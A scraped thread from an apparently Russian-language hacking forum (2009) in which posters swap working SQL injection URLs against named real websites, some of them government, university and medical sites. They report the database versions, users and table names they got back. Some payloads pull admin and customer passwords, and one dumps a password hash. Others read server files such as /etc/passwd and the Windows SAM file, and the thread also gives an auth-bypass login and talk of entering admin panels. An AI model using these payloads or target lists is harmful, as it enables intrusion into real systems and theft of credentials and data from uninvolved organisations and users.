http://apps.facebook.com/observerfacebook/?p=challenges&id=-1%20union%20select%201,group_concat(table_name),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17 +from+information_schema.tables
http://apps.facebook.com/observerfacebook/?p=challenges&id=-1%20union%20select%201,group_concat%28column_name% 29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20+from+i nformation_schema.columns+where+table_name=0x41646 D696E5F55736572
Admin table: Admin_User
http://apps.facebook.com/observerfacebook/?p=challenges&id=-1%20union%20select%201,group_concat%28id,0x3a,user id,0x3a,password,0x3a,name,0x3a,level%29,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17%20+from+Admin_User
5.0.81-community-log : jocurius_garrone@localhost
http://www.poze.name/poze.php?id_categ=-100+union+select+concat_ws(0x203a20,version(),user ())--
5.0.18 : root@localhost : localhost : root : Y
http://cuci.udg.mx/leerEvento.php?id=-100+union+select+1,concat_ws(0x203a20,version(),us er(),host,user,password,file_priv),3,4,5,6,7,8,9+f rom+mysql.user--
http://cuci.udg.mx/leerEvento.php?id=-100+union+select+1,load_file(0x2f6574632f706173737 764),3,4,5,6,7,8,9
http://www.let-online.co.uk/news_view.php?id=-4+union+select+1,group_concat(0x0b,column_name),3, 4+from+information_schema.columns+where+table_name =0x427573546f7055736572
BusTopUser::ID:UserName:UserPass
http://www.let-online.co.uk/news_view.php?id=-4+union+select+1,group_concat(0x0b,ID,0x3a,UserNam e,0x3a,UserPass),3,4+from+BusTopUser
MySQL 5.0.45
admin panel: http://www.let-online.co.uk/admin/login.php
вывод ошибок отключен
Coldplay.com pr7
Официальный сайт поп/рок группы coldplay.
http://www.coldplay.com/newsdetail.php?id=547'+union+select+null,null,null ,concat_ws(char(32,124,32),version(),user(),databa se(),@@version_compile_os),null,null,null,null,nul l+--+version | user | database | os
4.1.22-log | coldplay_user@vlonj205w1.emihosting.com | coldplay | redhat-linux-gnu
дуду еду
http://library.uncc.edu/knowledgebase/question.php?q=3+order+by+9/*&oquery=Borrow&dept=library
load_file ;-)
[x60]unu
10.11.2009, 17:31
http://www.weblaube.de/support/download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ ws(0x3a,version()),0,0,0,0+from+idesk_user--
version - 5.0.51a-24+lenny2
database - web5@localhost
user - usr_web5_2
os - debian-linux-gnu
users
http://www.weblaube.de/support/download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ ws(0x3a,user_name,password,last_login),0,0,0,0+fro m+idesk_user--
pelligrim
10.11.2009, 18:16
http://rassvet.websib.ru/portret_sec.htm?cod=1+and+substring(version(),1,1) =4
version: 4.1.20
database: cinema
user: shine@localhost
http://www.knyazev.ru/index.php?mm=7&id=-2+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4--
4.1.22-standard-log:balabol_knyazev:balabol_knyazev@web03.lan
Есть таблицы admins, clients
http://www.tutpricol.ru/message.php?id=9999+union+select+1,2,concat_ws(0x3 a,version(),database(),user()),4,5,6,7--
4.1.25-log:tutpric5_tutpricol:tutpric5_root@localhost
есть таблица users
maestra_toys
10.11.2009, 19:17
http://www.fc-anji.ru/news.php?id=1+union+select+1,concat_ws(0x3a,user() ,database(),version()),3,4,5,6
opendag@localhost:wwwopendagru:4.1.25-log
http://www.ovidiopol.com/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,us er(),database(),version()),5,6%20--
root@localhost:ovd:5.0.27
http://www.patrulrinpoche.ru/news.php?id=-72+union+select+concat_ws(0x3a,user(),database(),v ersion())
patrul_ru@localhost:patrul_ru:5.0.27-community-nt
http://www.caen.it/nuclear/news.php?id=-160+union+select+1,2,concat_ws(0x3a,user(),databas e(),version()),4,5,6,7,8,9%20--
mynews@localhost:CaenNews:5.0.77
http://www.phenomental.ru/news.php?id=-4+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4%20--
phenomenta@localhost:phenomenta_sql:4.1.22
[underwater]
10.11.2009, 20:27
http://www.erf-nimes.org/page_1.php?ID=-101+and+1=0+union+select+1,2,concat(nomutilisateur ,0x3a,motpasse),4+from+utilisateur--
http://www.greetingcard.org/about.php?ID=-1+union+select+1,concat_ws(0x3a,userUserName,userP assword,userID),3,4,5,6,7,8,9,10+from+users--
http://www.exhaus.de/index.php?siteID=2499+union+select+1,2,concat_ws(0 x3a,user(),version(),database()),4,5,6,7,8--
http://www.eamesoffice.com/vintage/spotting_detail.php?id=-92+and+1=0+union+select+1,2,3,4,5,6,7,8,concat%28u sername,0x3a,userpasswo
rd%29,10,11,12,13+from+users--
http://www.tasfrance.com/view_newsletter.php?id=-12+and+1=0+union+select+1,2,3,4,5,6,concat(clinum, 0x3a,password),8+from+password--
[x60]unu
10.11.2009, 21:48
portacafe.ru
Blind SQL -
http://portacafe.ru/index.html?id=1/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)j)k)l)/**/AND/**/1=1
version - 5.0.51a-24+lenny2-log
=))
revip:
star-force.ru
star-force.com
http://www.onlinesecurity-on.com/protect.phtml?c=55+union+select+1,2,3,database(),u ser(),6,7,8,9,10,11,12,version(),14,15,16,17+limit +1,1/*
onlinesecurity@localhost
onlinesecurity
5.0.45
DezMond™
10.11.2009, 22:03
http://www.shaman-magazine.com/fhs/template_e-magazine.php?ID=-125+union+select+1,2,3,4,5,6,7,8,9,10,11+/*+&bereich=1
http://ashleybakery.com/features.php?ID=-1+union+select+1,2,3,4+--+
http://gorabazarici.org/news.php?id=-14+union+select+1,2,concat_ws(0x3a3a,admin_id,admi n_username,admin_password),4,5+from+admin_master+--+
http://photo-usa.ru/magazine.php?action=goodsdescription&target=-937+union+select+1,2,3,4,5,6,7,8,9,10+/*+
http://www.soulsista.nl/pages/magazine.php?onderwerp=diggindeep&id=-63+union+select+1,2,3,4,5,6,7,8,9+from+admin+/*+&lastlink=magazine
http://www.ilfaroonline.it/magazine.php?id=-487+union+select+1,2,pass,4,5,6+from+admin+--+
http://www.police.sec.ps/magazine.php?id=-1+union+select+1,password,user,4,5,6,7+from+_user+--+
http://zy.excite.co.jp/p/magazine.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17+/*+
http://www.rustavi2.com/news/calendar_newsg.php?pg=&ddd=-2.9.2009%27%20UNION%20SELECT%201,2,3,user%28%29,ve rsion%28%29,6,7,8,9,10,11,12,13,14,15,16,17%23&ddd2=2-9-2009&month=10&year=2009&wth=&ct=0&id_news=0
Походу дидосят... Ну вот докучи скуль :)
ПР6
http://health.utah.gov/medicaid/pharmacy/priorauthorization/view.php?id=-1+union+select+1,2,3,4,5--
ver: 4.1.6-gamma-standard-log
base: pharmacy
user: pharmadmin@hlcblxweb1.hl
os: pc-linux
[underwater]
10.11.2009, 23:56
http://group.ge/show.php?id_series=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
http://www.dco.es/doxanews.php?id=-1+union+select+all+concat_ws(0x3a,version(),user() ,database()),2,3,4,5,6--
http://www.soundboards.com/comment.php?id=null%20union%20all%20select%201,2,3 ,concat(email,0x3a,password),5%20from%20users--
http://erem.ru/pages/products.html?id=-11+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7,8,8,10,11,12,13--
eremeevskoe:4.0.16:eremeevskoe@localhost
ТИЦ80
ПР2
ololo shkolota
http://dag.com.ua/nikolaev/schools/index.php?show=article&new_id=1+union%20all+select+1,null,null,null,null, null,null,null+--+
ТИЦ130
ILYAtirtir
11.11.2009, 03:54
Федеральное Космическое Агенство.Научный Центр Оперативного Мониторинга Земли.
http://catalog.ntsomz.ru/data_new/dataset/ds_det.php?ds=RRR'+union+select+null,BANNER||user, null,null,null,null,null,null,null,null,null,null, null,null,null+from+v$version--
CORE 9.2.0.1.0 Production||OMZ
http://thema.ntsomz.ru/modis/cgi/modis_proj.pl?id=2404&type=modis'+union+select+1,2,3,4,5,6,7,8,9,10,11,c oncat_ws(0x3a,database(),user(),version()),13--+
granules_products:granules_reader@localhost:5.0.45-log
maestra_toys
11.11.2009, 12:34
ТИЦ 20 ПР 5
http://www.insanely-great.com/news.php?id=-10655+union+select+1,2,3,concat_ws(0x3a,user(),dat abase(),version()),5,6,7,8,9,10,11,12,13,14,15,16, 17,18 --
flamini_flaminio@216.14.208.109:flamini_igm:4.1.21-log
ПР 5
http://www.grfoundation.org/news.php?id=-62+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5,6,7,8,9,10
grcf@localhost:grcf:5.0.51a
s0l_ir0n
11.11.2009, 13:07
Даже не знаю что это:
dekulk@localhost:dekulk:5.0.51a
http://www.dekulk.nl/doc.php?id=-1+union+select+1,2,3,ConCat_ws%280x3a,user%28%29,d atabase%28%29,version%28%29%29,5+--
Вывод скули через сохранение php файла :D
ws-univ@localhost:ws-univ:4.1.22
http://widener.webstudy.com/doc.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,ConCat_w s(0x3a,user(),database(),version()),14,15,16,17,18 ,19,20,21,22+--
Университет Танзании:
aru_web@localhost:aru_web:5.0.22
http://www.aru.ac.tz/doc.php?id=-1+union+select+ConCat_ws(0x3a,user(),database(),ve rsion()),2,3,4,5,6,7,8,9,10,11+--
Сайт про остеохондроз:
h2ssd-m_root@localhost:h2ssd-m_spinet:5.0.45-log
http://spinet.ru/voting/stat.php?id=-1+union+select+1,ConCat_ws%280x3a,user%28%29,datab ase%28%29,version%28%29%29,3--
mailbrush
11.11.2009, 13:49
flamman.se
http://www.flamman.se/senaste.php?id=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,user() ,database(),version()))),4,5,6,7,8
u4517781@webludde.ballou.se:u4517781_1:4.1.13-standard
basketme.com
http://www.basketme.com/2.0/opinion.php?id=-70+UnIoN+SeLeCt+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5,6,7,8
cm187240@81.88.49.32:cm187240:5.0.60sp1-enterprise-gpl-log
diariodelasislas.es
http://www.diariodelasislas.es/opinion.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4
diario@localhost:diario:4.1.20
pelligrim
11.11.2009, 14:58
http://www.severyanka.ru/news.php?id=12+union+select+1,2,3,version()--
4.1.22:stsbs_nsk_severyanka:stsbs-nsk_sever@212.193.229.149
есть таблица clients
http://www.region-media.ru/city.php?id=99989+union+select+1,2,3,4,5,concat_ws (0x3a,version(),database(),user()),7--
5.0.22:wwwregionpressar_wwwregionmediar:region01_w wwregi@localhost
http://bfvz.ru/thanks.php?id=999999+union+select+1,concat_ws(0x3a ,version(),database(),user()),3--
5.0.45:bfvz_bfvz:bfvz@localhost
сайтик как вы уже наверное догадались на финском)
http://www.ymparistokasvatus.fi/vihrealippu/osallistujat/show.php?id=-110+union+select+1,unhex(hex(concat_ws(0x3a,Id,use rname,password))),3,4,5,6,7,8,9,10,11,12+from+admi ns--
парольчик подходит, так што милости просим в админку) ;)
погнали дальше!!!
http://www.surfnet.fi/zargon/movies/show.php?id=-207+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,concat_ws(0x3a,dat abase(),version(),user(),@@version_compile_os),26, 27,28,29,30--
zargon:4.1.12-standard:pc-linux-gnu-log:zargon@localhost
http://www.surfnet.fi/zargon/movies/show.php?id=-207+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,concat_ws(0x3a,use r_name,user_password),26,27,28,29,30+from+4images_ users--
http://www.surfnet.fi/zargon/movies/show.php?id=-207+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,concat_ws(0x3a,use r,passwd),26,27,28,29,30+from+users--
диры
/
/download/
/search/
/cgi-bin/
/images/
/news/
/links/
/support/
/forum/
/services/
/partners/
/banner/
/mobile/
/weather/
/entertainment/
/doc/
/chat/
/tv/
/multimedia/
/pictures/
/test/
/navigation/
/portfolio/
/polls/
/comics/
/pop/
/ssh/
/guestbook/
/bilder/
/co/
/presentation/
/inc/
/regional/
/iso/
/fonts/
/cinema/
/IT/
/mil/
/lunch/
/vortex/
/htdig/
/http%3A%2F%2Fwww/
/newsimages/
/reklam/
/happenings/
/cgi-bin2/
/regionalnews/
/contact/
/ws/
/messenger/
/tourism/
/webshop/
/newusers/
/faq/
/css/
/cat/
/isp/
/price/
/webcam/
/booking/
/icons/
/pub/
/users/
/errors/
--------------------------------
--------------------------------
[x60]unu
11.11.2009, 17:22
history.uk.com -
http://www.history.uk.com/mailing/index.php?iD=0/**/and/**/1=2%20/**/union/**/all/**/select/**/version(),2/**/FROM/**/mysql.user/*
version - 5.0.20-log
user - root@localhost
database - history
mysql.user
user - root
password - C08D908F016260368DD6A842F1E03730F8FD0D20
фильтраця - p
file_priv - Y
http://www.history.uk.com/mailing/index.php?iD=0/**/and/**/1=2%20/**/union/**/all/**/select/**/concat_ws(char(42,42,42),user,password,'p',file_pr iv),2/**/FROM/**/mysql.user/*
etc/passwd
http://www.history.uk.com/mailing/index.php?iD=0/**/and/**/1=2%20/**/union/**/all/**/select/**/load_file('/etc/passwd'),2/**/FROM/**/mysql.user/*
ILYAtirtir
11.11.2009, 19:32
Республика Алтай :: официальный интернет-портал
тИЦ: 600
PR: 6
http://www.altai-republic.com/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=20000+union+select+1,2,concat_ws(0x3a,databa se(),user(),version()),4,5&page=1
altaire8_ra:altaire8_ra@localhost:4.1.25-log
Работаем за спасибо!)
Xcontrol212
11.11.2009, 20:59
http://www.cyclosprint.eu/shop.php?cid=93&hmID=-1+union+select+1,concat_ws(%27;%27,login,password) ,3,4,5,6,7,8,9+from+users_admin+limit+1,1/*
http://www.cap-press.com/cart.php?add=-1+union+select+1,version()--
5.0.67-log
5 версия
capsci_r@209.68.2.28
capsci_bookdb
Таблицы:
auth_scr
auth_scr_reply
authbook
authors
book_links
books
books_forwarding
books_link
books_tmp
booksubj
contacts
discounts
frontpage
minosubjects
misc
orders
page_contents
series
series_book
subjects
supps
tms
tracklog
http://www.euroinf.it/shop/shop.php?id=-1 union select 1,2,3,Column_Name,5,6,7,8 from INFORMATION_SCHEMA.Columns where Table_Name=0x636c69656e746932/*
Тут видны все таблы:
http://www.euroinf.it/shop/shop.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+INFOR MATION_SCHEMA.TABLES/*
Говермент)
MySQL 5.0.45-community-nt
сервер на винде
http://odpa14.gov.ua/?_npp=-3746+union+select+1,concat_ws(0x3a,user,0x3a,passw ord,0x3a,file_priv)+from+mysql.user
http://odpa14.gov.ua/?_npp=-3746+union+select+1,hex(load_file(0x633a2f77696e64 6f77732f7265706169722f73616d)) - чтение файлов на сервере. файл sam
http://housewives.org.ua/text.php?id=-689 union select 1,2,3,4,concat_ws(0x3a,version(),user(),databa se()) --
4.1.25-log:freemp3_slovo@193.200.173.5:freemp3_slovo
PR4
http://www.proconsim.ru/cat.php?m=-1+union+select+1,2,3,concat_ws(0x3a,user(),%20vers ion(),%20database()),5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41/*
PR1
http://www.czech-tech.ru/index.php?dword=catalog&id=10+union+select+1,2,3,table_name+from+INFORMATI ON_SCHEMA.TABLES+LIMIT+1,1 --
PR3
http://www.baurum.ru/_library/?cat=pipes-plastic&id=-9999+union+select+1,2,concat_ws(0x3a,%20version(), %20user(),%20database()),4,5,6,7,8,9,10,11,12/*
Mr.Br0wn
12.11.2009, 01:49
http://www.slavgorod.ru/admin/editnews.php?id=3775{SQL}
login: ' or 1=1/*
password: ' or 1=1/*
http://www.slavgorod.ru/admin/
ТИЦ: 230
PR: 3
Секас-шоп, закупаемся ^^
http://www.extremerestraints.com/tell_a_friend.php?products_id=1248+union+select+*+ from+(select+*+from+(select+name_const((select+con cat_ws(0x2F,customers_email_address,customers_pass word)+from+customers+limit+0,1),14)d)+as+t+join+(s elect+name_const((select+concat_ws(0x2F,customers_ email_address,customers_password)+from+customers+l imit+0,1),14)e)b)a--+
hack-win32
12.11.2009, 17:01
infofir_seadmin@98.130.0.136:infofir_SE:5.0.41-community-log[/B]
http://www.senesco.com/newsitem.php?id=-168+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version())--
monkey0_nick@localhost:monkey0_jo151:4.0.27-standard
http://www.nivb.com/newsitem.php?item=-122+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4--
u10118317@lon1-webmysql-2.msh.demon.net:u10118317:4.0.30-log
http://www.jadeprint.com/newsitem.php?recordID=-12+union+select+1,2,3,4,5,concat_ws(0x3a,user(),da tabase(),version()),7,8--
alvin@205.178.145.65:alvinsingleton:4.1.22-log
http://www.alvinsingleton.com/newsitem.php?id=-3+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2,3,4--
web108-craven@localhost:web108-craven:5.0.86-community
http://www.craven-property.com/newsItem.php?id=-51+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7--
blackroc_website@localhost:blackroc_general:5.0.77-community
http://blackrockspeedway.net/news/newsItem.php?tag=1&year=2009&item=-9+union+select+1,2,3,4,5,concat_ws(0x3a,user(),dat abase(),version())--
alteuser@localhost:alte:4.0.22
http://www.alte.org/news/newsitem.php?newsID=-197+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5--
njwfadb@208.109.181.105:njwfadb:4.1.22-max-log
http://www.njworkingfamilies.org/newsItem.php?nwID=-34+union+select+1,2,3,4,concat_ws(0x3a,user(),data base(),version()),6--
fiddlefolk@localhost:fiddlefolk:5.1.35
http://www.fiddleworkshop.co.uk/newsitem.php?id=-84+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5--
churchdbuser@localhost:church:5.0.22-Debian_0ubuntu6.06.9-log
http://www.churchbuyinggroup.co.uk/newsitem.php?news_id=-7+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7--
danielkawczynski@localhost:danielkawczynski:5.0.51 a-3ubuntu5.4
http://www.daniel4shrewsbury.co.uk/newsitem.php?newsid=-15+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8--
вывод в ошибке
http://survey.tpg.nl/php/main.phtml?c-Object=surv&c-Action=showform&c-Mode=test&ID=334+union+select+1,2,3,4,5,6,7,8,9,10,user(),12 ,13,14,15,16,17+limit+1,1/*
version()=4.0.21
user()=tpgsurveyuser3@localhost
http://ezonet.ru/teldir.php?catID=-36+union+select+concat_ws(0x3a,version(),database( ),user(),@@version_compile_os)
4.0.27-max-log:ezonet77:ezonet77@v50.valuehost.ru:unknown-freebsd4.7
http://www.motorama.be/show.php?id=-117+union+select+1,2,concat_ws(database(),user(),v ersion(),@@version_compile_os),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17--
root@localhostmotorama4.1.20-logmotoramaredhat-linux-gnu
http://www.motorama.be/show.php?id=-117+union+select+1,2,concat_ws(0x3a,user,password) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.us er--
LFI:
http://www.motorama.be/show.php?id=-117+union+select+1,2,load_file('/etc/group'),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
ILYAtirtir
13.11.2009, 00:48
Официальный сайт министерства экономики Республики Бурятия
http://economy.buryatia.ru/index-n.htm?a=short&p=1&t=3333+union+select+1,2,concat_ws(0x3a,database(), user(),version()),4,5,6,7,8--
economy_ru:newser@localhost:5.0.41-log
Народное Собрание Республики Ингушетия
http://www.parlamentri.ru/news.php?arcyear=2008+and+substring(version(),1,1) =3--+&arcmonth=12
Продолжаем за спасибо)
PR5
http://www.horwoodpublishing.net/order.php?id=-140+union+select+1,concat_ws(0x3a,username,pwd),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from +tbl_users--
version: 4.1.15-standard-log
database: horwoodpub
-----------------------------------------
PR5
http://www.iams.co.uk/cat/where-to-buy.php?id=-46+union+select+1,concat_ws(0x3a,version(),databas e()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25--
version: 5.0.37-community-log
database: iamsfr
-----------------------------------------
PR5
http://www.rtos.com/page/product.php?id=-2+union+select+1,2,version(),4--
version: 4.1.20-log
database: expresslogic
http://www.designtrend.hu/index.php?inc=rovat&RId=-1+Union+select+1,concat_ws(0x3a,version(),database (),user(),@@version_compile_os),3,4--
5.1.38:dcmagazin:dcmagazin@localhost: portbld-freebsd7.2
http://miami21.metro1companies.com/details.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),database(),user(),@@version_compile_os),9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,6 1,62,63,64,65--
4.1.22:metro1_1:gt3creative@localhost: portbld-freebsd4.10
http://www.meechannel.com/index.php?sec=organize&setid=-1+union+select+concat_ws(0x3a,version(),database() ,user(),@@version_compile_os)--
http://www.meechannel.com/index.php?sec=organize&setid=-1+union+select+concat_ws(0x3a,user,password)+from+ mysql.user+limit+16,21--
5.0.27:meechannel:meechannel@localhost:redhat-linux-gnu
http://www.gtk.fi/slr/article.php?id=-18+union+select+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6,7,8,9,10, 11--
5.0.77:slr:slr@localhost:redhat-linux-gnu
http://www.ventasport.ru/tovar.php?id=1/**/union/**/select/**/1,concat_ws(0x3a,version(),database(),user(),@@ver sion_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18/*
4.0.27-log:db12509m:m12509@fhe7.hoster.ru: portbld-freebsd7.0
http://www.shinamir.ru/index.php?pageId=-50+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4,5,6,7,8,9,10
http://www.shinamir.ru/index.php?pageId=-50+union+select+1,2,concat_ws(0x3a,user,password), 4,5,6,7,8,9,10+from+mysql.user+limit+24,24
5.0.45-log:shinamir:shinamir@localhost:redhat-linux-gnu
http://www.avk-bearing.ru/n.php?id=7+and+1=0+union+select+1,2,3,4,5--
http://www.gotranslators.ru/cv.php?dir=22&id=486+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35--
http://www.sdosug.ru/vote.php?ID=132+and+1=0+union+select+1,2,3,4--
http://girl.veneradosug.ru/vote.php?ID=92+and+1=0+union+select+1,2,3,4--
http://piter.dosug24.ru/vote.php?ID=705+and+1=0+union+select+1,2,3,4--
http://www.craft-russia.ru/rdvs/index.php?id=-41+union+select+concat_ws(0x3a,user(),database(),v ersion()),2,3,4,5+--+
Database Version: 5.0.67-log
Database name: u45240
User name: u45240@10.10.223.201
http://www.estensa.it/web-agency-dett-news.php?id=-33+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7,8,9,10--
database: Sql161320_1
version: 5.0.82sp1-log
user: Sql161320@62.149.141.31
http://www.spes-forum.be/spes/page.php?LAN=N&FILE=agendadetail&ID=-942+union+select+1,user(),3,4,5,6,7,8,9,10,11,12--
log-standard-4.1.13
http://insidestory.mxv.be/page.php?id=-22+union+select+1,2,version(),4,5--
5.0.45-log
http://www.flandersmusic.be/page.php?ID=-65+union+select+version()--
5.1.36-0.dotdeb.0
http://www.payperclickuniverse.com/search-engine-latest-news.php?v=more&id=-66+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5,6,7--
database:ppcu_ppc
version:4.1.22-log
user:ppcu@web2-int
http://www.iolabsinc.com/news.php?id=-66+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5,6--
database:iolabs
version:5.0.67-userstats-log
user:iolabs@waboba.com
http://www.thekarchergroup.mobi/mobile-news.php?id=-66+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
database:TheKarcherGroup
version:5.0.45-log
user:thekarchergroup@php5.thekarchergroup.com
http://www.jazzdimensions.de/news.php?ort=Berlin&id=-66+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--
database:db16424844
version:4.0.27-max-log
user:dbo16424844@195.20.225.5
http://www.sportpark-quickborn.de/news.php?id=-66+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5--
database:DB352449
version:5.0.67-log
user:U352449@hoon.store
MSsql
PR 5
http://www.kajaaninteatteri.fi/index.asp?pid=447%27+or+447=(select+top+1+table_na me+from+information_schema.tables+where+table_name +not+in+(%27www_menusettings%27,%27dtproperties%27 ,%27postituslista_asetukset%27,%27postituslista_as iakkaat%27,%27postituslista_lahetykset%27,%27posti tuslista_ryhmat%27,%27postituslista_sivupohjat%27, %27sysconstraints%27,%27syssegment%27,%27syssegmen ts%27,%27www_area%27,%27www_clientsettings%27,%27w ww_counter%27))%20--
http://www.sotkamo.fi/index.asp?pid=285%27+or+285=(select+top+1+table_na me+from+information_schema.tables+where+table_name +not+in+(%27auutiset_alueet%27,%27yritysrekisteri% 27,%27auutiset_uutiset%27,%27www_area%27))%20--
PR4
http://www.natural-insect-control.com/product.php?id=000000283+and+1=0+union+select+1,co ncat_ws(0x3a,User,Password),3,4+from+mysql.user--
version: 5.0.77-log
user: root@localhost
database: naturalinsect
PR2
http://www.ldicolortoolbox.com/product.php?id=98&cid=30+and+1=0+union+select+1,concat_ws(0x3a,versi on(),database(),user()),3,4,5,6--
version: 4.1.20
user: dang@localhost
database: ldi
PR6
http://www.mercurymarine.com/newsandevents/newsdetail.php?ID=20+and+1=0+union+select+1,concat _ws(0x3a,version(),user(),database()),3,4,5,6,7,8, 9,10,11,12--
4.1.21:mercury@localhost:mercurymarine
PR5
http://www.adventureplus-bg.com/story.php?id=21+and+1=0+union+select+concat_ws(0x3 a,version(),user(),database())--
4.0.26a:top@sg-acd12:top
PR5
http://channelstv.com/prog_transcript.php?id=34+and+1=0+union+select+1,2 ,concat_ws(0x3a,version(),user(),database()),4,5--
4.1.22-log:channels_user@67.205.111.186:channels
PR5
http://www.digital-everywhere.com/shop/index.php?page=artikel&pkateg=20+and+1=0+union+select+1,2,3,concat_ws(0x3 a,version(),user(),database()),5--
4.1.22-standard-log:db188898_1@local2:db188898_1
PR4
http://www.digital-everywhere.com/shop/index.php?page=artikel&pkateg=20+and+1=0+union+select+1,2,3,concat_ws(0x3 a,version(),user(),database()),5--
4.1.22-standard-log:db188898_1@local2:db188898_1
PR4
http://www.game-reviews.ca/news.php?id=1422+and+1=0+union+select+1,concat_ws( 0x3a,login,password),3,4,5,6,7,8,9,10,11+from+admi n--
5.0.67-standard:gamerevi_news@localhost:gamerevi_gamenews
PR3
http://www.adventureplus-bg.com/story.php?id=21+and+1=0+union+select+concat_ws(0x3 a,version(),user(),database())--
4.0.26a:top@sg-acd12:top
PR3
http://juggler.artinact.com/a-imglib/showimg.php?id=15+and+1=0+union+select+1,2,concat_ ws(0x3a,version(),user(),database()),4,5,6,7,8--
4.1.22-standard-log:artinact_juggler@localhost:artinact_juggler
PR3
http://fitnessbuildshealth.com/trainers.php?id=39+and+1=0+union+select+1,2,3,4,5, concat_ws(0x3a,version(),user(),database()),7,8,9, 10,11,12,13,14,15,16--
4.1.20-max-log:start6_ray@71.18.216.33:start6_fit
pelligrim
15.11.2009, 13:34
http://ukrturizm.com.ua/index.php?id=-293+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7--
4.1.25-log:atur@localhost:atur
http://www.tsetse220.com/news.php?id=-142+union+select+1,concat_ws%280x3a,version%28%29, user%28%29,database%28%29%29,3,4,5--
5.0.51a-3ubuntu5.4:root@localhost:tsetse220
http://www.otcheta.net/news.php?id=13005+and+substring%28version%28%29,1, 1%29=4
version: 4.1.25-log
hack-win32
15.11.2009, 20:19
db9330@64.13.192.28:db9330_blog:4.1.25-Debian_mt1
http://www.blamm.com/top10.php?id=-8+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47--
codeglue2@WSWWW07:codeglue2:5.0.85-community-nt
http://www.codeglue.com/game.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19--
rpgui@localhost:RPGuides:5.0.51a-3ubuntu5.4
http://www.rpguides.de/dnd/game.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ ws(0x3a,user(),database(),version()),14,15--
http://www.rav.org/upper/newsDetail.php?id=170+union+select+1,2,3,4,5,6,7,8 ,9,10--
user:sql@maimonides.org@207.155.252.14
base:maimoDB
os:sun-solaris2.8
mysql.user:sql@maimonides.org
file_priv:N
ver:4.1.22-log
[ id,username,pwd ] from [ users ]
-----------------------------------------
DezMond™
16.11.2009, 12:50
http://www.cg.com.ve/noticia.php?id=-222+union+select+1,concat_ws(0x3a3a,login,contrase na,nombre),3,4,5,6,7,8,9,10,11,12+from+usuarios+li mit+2,1+/*+
http://www.pepedoro.it/pepedoroblog/magazine.php?acts=report&id=-79'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17+/*+
